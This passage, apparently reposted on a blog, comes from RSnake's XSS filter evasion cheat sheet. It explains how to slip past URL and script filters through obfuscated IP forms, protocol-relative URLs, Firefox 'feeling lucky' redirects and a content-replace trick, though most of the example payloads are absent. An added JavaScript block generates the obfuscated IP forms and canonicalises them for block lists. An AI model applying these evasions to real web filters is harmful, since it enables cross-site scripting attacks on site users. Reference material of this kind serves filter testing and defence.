    Dword encoding (Note: there are other variations of Dword encoding - see the IP Obfuscation calculator below for more details):



    Hex encoding (the total amount of padding allowed in each number is somewhere in the neighborhood of 240 characters, as you can see on the second octet, and since a hex digit runs from 0 to F the leading zero on the third hex octet is not required):



    Octal encoding (again padding is allowed, although you must keep it above 4 total characters per octet - class A, class B, etc.):



    Mixed encoding (let's mix and match base encoding and throw in some tabs and newlines - why browsers allow this, I'll never know). The tabs and newlines only work if this is encapsulated with quotes:

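    Added example, not the cheat sheet's own code: the numeric host forms described in the entries above (dword, hex, octal, padding, mixed bases with embedded tabs and newlines) produced from a dotted quad, and the reverse direction as an inet_aton-style parser, which is what a URL filter needs to canonicalise a host before comparing it against a block list. 192.0.2.1 is a placeholder address (TEST-NET-1), not one from the page.

```javascript
// Added example, not the cheat sheet's code: IP obfuscation forms and an
// inet_aton-style parser that undoes them. 192.0.2.1 is a placeholder.

function ipToBytes(dotted) {
  const parts = dotted.split('.').map(Number);
  if (parts.length !== 4 || parts.some((p) => !Number.isInteger(p) || p < 0 || p > 255)) {
    throw new Error('expected a dotted quad');
  }
  return parts;
}

// Dword: the 32-bit value as one decimal number (plain arithmetic, because
// JS bitwise operators are signed 32-bit and would go negative here).
function toDword(dotted) {
  return ipToBytes(dotted).reduce((acc, b) => acc * 256 + b, 0);
}

// Hex and octal per octet; `pad` adds the leading zeros the text says
// browsers tolerate.
function toHex(dotted, pad = 0) {
  return ipToBytes(dotted).map((b) => '0x' + b.toString(16).padStart(pad, '0')).join('.');
}
function toOctal(dotted, pad = 0) {
  return ipToBytes(dotted).map((b) => '0' + b.toString(8).padStart(pad, '0')).join('.');
}

// inet_aton-style parsing: 1 to 4 parts, each decimal, 0x-hex or 0-octal,
// the last part supplying all remaining bytes; tab/CR/LF are dropped first
// (the text: they are ignored inside a quoted URL). Returns the canonical
// dotted quad, or null when the string is not a numeric host.
function parseHostIp(host) {
  const parts = host.replace(/[\t\r\n]/g, '').split('.');
  if (parts.length < 1 || parts.length > 4) return null;
  const nums = parts.map((p) => {
    if (/^0x[0-9a-f]+$/i.test(p)) return parseInt(p.slice(2), 16);
    if (/^0[0-7]+$/.test(p)) return parseInt(p, 8);
    if (/^[0-9]+$/.test(p)) return parseInt(p, 10);
    return NaN;
  });
  if (nums.some(Number.isNaN)) return null;
  const last = nums.pop();
  const lastBytes = 4 - nums.length;
  if (nums.some((n) => n > 255) || last >= 256 ** lastBytes) return null;
  const bytes = [...nums];
  for (let i = lastBytes - 1; i >= 0; i--) bytes.push(Math.floor(last / 256 ** i) % 256);
  return bytes.join('.');
}

// A filter that compares the raw host string misses every form below; one
// that canonicalises through parseHostIp() first does not.
const IP = '192.0.2.1';
const FORMS = [
  String(toDword(IP)),      // 3221225985
  toHex(IP),                // 0xc0.0x0.0x2.0x1
  toHex(IP, 8),             // padded hex
  toOctal(IP),              // 0300.00.02.01
  toOctal(IP, 4),           // padded octal
  '0xc0.\t0.\n02.1',        // mixed bases with an embedded tab and newline
];
for (const f of FORMS) console.log(JSON.stringify(f), '->', parseHostIp(f));
```

    The parser also accepts the short forms inet_aton allows (a single 32-bit number, or a.b.c with c filling two bytes), and rejects anything that is not a numeric host, so a block list keyed on the canonical dotted quad sees the same address whichever spelling the URL used.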


    Protocol resolution bypass (// translates to http://, which saves a few more bytes). This is really handy when space is an issue too (two fewer characters can go a long way) and can easily bypass a regex like "(ht|f)tp(s)?://" (thanks to Ozh for part of this one). You can also change the "//" to "\\". You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL:



    Google "feeling lucky" part 1. Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable page is the top result for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox's "keyword:" protocol. You can concatenate several keywords by using something like the following "keyword:XSS+RSnake", for instance. This no longer works within Firefox as of 2.0:


    Google "feeling lucky" part 2. This uses a very tiny trick that appears to work in Firefox only, because of its implementation of the "feeling lucky" function. Unlike the next one, this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not. It's simply a malformed URL. If you click okay on the dialog it will work, but as a result of the erroneous dialog box I am saying that this is not supported in Opera, and it is no longer supported in Firefox as of 2.0:



    Google "feeling lucky" part 3. This uses a malformed URL that appears to work in Firefox and Opera only, because of their implementation of the "feeling lucky" function. Like all of the above it requires that you are #1 in Google for the keyword in question (in this case "google"):



    Removing CNAMEs (when combined with the above URL, removing "www." will save an additional 4 bytes, for a total byte savings of 9 on servers that have this set up properly):



    Extra dot for absolute DNS:



    JavaScript link location:



    Content replace as attack vector (assuming "http://www.google.com/" is programmatically replaced with nothing). I actually used a similar attack vector against several separate real world XSS filters by using the conversion filter itself to help create the attack vector (i.e. "java&#x26;#x09;script:" was converted into "java&#x09;script:", which renders in IE, Netscape 8.1+ in secure site mode and Opera):



Character Encoding:
    All the possible combinations of the character "<" in HTML and JavaScript (in UTF-8). Most of these won't render out of the box, but many of them can get rendered in certain circumstances as seen above (standards are great, aren't they?):





Browser support reference table:


IE7.0 Vector works in Internet Explorer 7.0. Most recently tested with Internet Explorer 7.0.5700.6 RC1, Windows XP Professional SP2.
IE6.0 Vector works in Internet Explorer 6.0. Most recently tested with Internet Explorer 6.0.28.1.1106CO, SP2 on Windows 2000.
NS8.1-IE Vector works in Netscape 8.1+ in IE rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional. This used to be called trusted mode, but Netscape has changed its security model away from the trusted/untrusted model and has opted for Gecko as the default and IE as an option.
NS8.1-G Vector works in Netscape 8.1+ in Gecko rendering engine mode. Most recently tested with Netscape 8.1 on Windows XP Professional.
FF2.0 Vector works in Mozilla's Gecko rendering engine, used by Firefox. Most recently tested with Firefox 2.0.0.2 on Windows XP Professional.
O9.02 Vector works in Opera. Most recently tested with Opera 9.02, Build 8586 on Windows XP Professional.
NS4 Vector works in older versions of Netscape 4.0 - untested.

Note: if a vector is not marked it either does not work or it is untested.


Written in vim, and UTF-8 encoded, for her pleasure.
All rights reserved, all wrongs observed.
© 1995-2008 RSnake

Posted by CEOinIRVINE

CIS benchmarks

Hacking 2009. 2. 6. 09:19

Posted by CEOinIRVINE